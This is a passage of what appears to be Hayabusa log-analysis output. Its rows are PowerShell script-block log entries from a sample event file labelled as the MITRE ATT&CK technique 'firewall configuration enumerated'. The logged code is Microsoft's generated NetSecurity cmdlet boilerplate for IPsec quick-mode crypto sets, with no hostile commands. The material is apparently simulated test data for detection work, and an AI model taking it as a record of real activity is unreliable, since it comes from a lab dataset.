[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { 
$__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object 
$script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( 
[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and 
(@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') 